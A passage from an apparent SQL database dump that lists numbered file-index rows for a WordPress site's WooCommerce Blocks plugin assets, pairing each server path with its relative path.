checkout/styles/style.scss'),(8976,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/types.ts'),(8977,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/utils.ts'),(8978,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/archive-product.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/archive-product.ts'),(8979,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/assets/doc-image-single-product-classic-block.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/assets/doc-image-single-product-classic-block.png'),(8980,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/constants.ts'),(8981,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/editor.scss'),(8982,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/index.tsx'),(8983,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/order-confirmation.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/order-confirmation.tsx'),(8984,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/product-search-results.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/product-search-results.ts'),(8985,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/single-product.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/single-product.ts'),(8986,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/style.scss'),(8987,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/test/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/test/utils.ts'),(8988,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/types.ts'),(8989,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/classic-template/utils.ts'),(8990,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/block.json'),(8991,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/block.tsx'),(8992,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/edit.tsx'),(8993,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/editor.scss'),(8994,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/index.tsx'),(8995,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/sidebar-settings.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/sidebar-settings.tsx'),(8996,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/style.scss'),(8997,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/customer-account/types.ts'),(8998,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/block-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/block-controls.tsx'),(8999,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/call-to-action.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/call-to-action.tsx'),(9000,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/constants.ts'),(9001,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/constrained-resizable.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/constrained-resizable.tsx'),(9002,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/edit.tsx'),(9003,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/block.json'),(9004,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/block.tsx'),(9005,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/editor.scss'),(9006,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/example.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/example.ts'),(9007,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/index.tsx'),(9008,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/style.scss'),(9009,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-category/utils.ts'),(9010,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/block.json'),(9011,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/block.tsx'),(9012,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/editor.scss'),(9013,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/example.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/example.ts'),(9014,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/index.tsx'),(9015,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/featured-product/style.scss'),(9016,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/image-editor.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/image-editor.tsx'),(9017,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/inspector-controls.tsx'),(9018,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/register.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/register.tsx'),(9019,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/style.scss'),(9020,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/types.ts'),(9021,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/use-background-image.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/use-background-image.ts'),(9022,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/utils.ts'),(9023,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-api-error.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-api-error.tsx'),(9024,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-edit-mode.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-edit-mode.tsx'),(9025,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-editing-image.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-editing-image.tsx'),(9026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-featured-item.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-featured-item.tsx'),(9027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-update-button-attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-items/with-update-button-attributes.tsx'),(9028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/block.json'),(9029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/block.tsx'),(9030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/context.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/context.ts'),(9031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/edit.tsx'),(9032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/frontend.ts'),(9033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/index.tsx'),(9034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/register-components.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/register-components.ts'),(9035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/types.ts'),(9036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/upgrade.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/filter-wrapper/upgrade.tsx'),(9037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/block.json'),(9038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/block.tsx'),(9039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/edit-mode.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/edit-mode.tsx'),(9040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/edit.tsx'),(9041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/editor.scss'),(9042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/index.tsx'),(9043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/inspector-controls.tsx'),(9044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/types.ts'),(9045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/constants.ts'),(9046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/index.ts'),(9047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/migration-from-product-collection-to-products.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/migration-from-product-collection-to-products.ts'),(9048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/migration-from-products-to-product-collection.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/migration-from-products-to-product-collection.ts'),(9049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/migration-utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/migration-utils.ts'),(9050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/migration-products-to-product-collection/types.ts'),(9051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/block.json'),(9052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/block.tsx'),(9053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/component-frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/component-frontend.tsx'),(9054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/edit.tsx'),(9055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/editor.scss'),(9056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/frontend.ts'),(9057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/index.tsx'),(9058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/attributes.tsx'),(9059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/block.tsx'),(9060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/edit.tsx'),(9061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/editor.scss'),(9062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/index.tsx'),(9063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/allowed-blocks.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/allowed-blocks.ts'),(9064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/block.json'),(9065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/edit.tsx'),(9066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/frontend.tsx'),(9067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/empty-mini-cart-contents-block/index.tsx'),(9068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/block.json'),(9069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/edit.tsx'),(9070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/frontend.tsx'),(9071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/filled-mini-cart-contents-block/index.tsx'),(9072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/index.tsx'),(9073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/attributes.tsx'),(9074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/block.json'),(9075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/block.tsx'),(9076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/constants.tsx'),(9077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/edit.tsx'),(9078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-cart-button-block/index.tsx'),(9079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/attributes.tsx'),(9080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/block.json'),(9081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/block.tsx'),(9082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/constants.tsx'),(9083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/edit.tsx'),(9084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocomm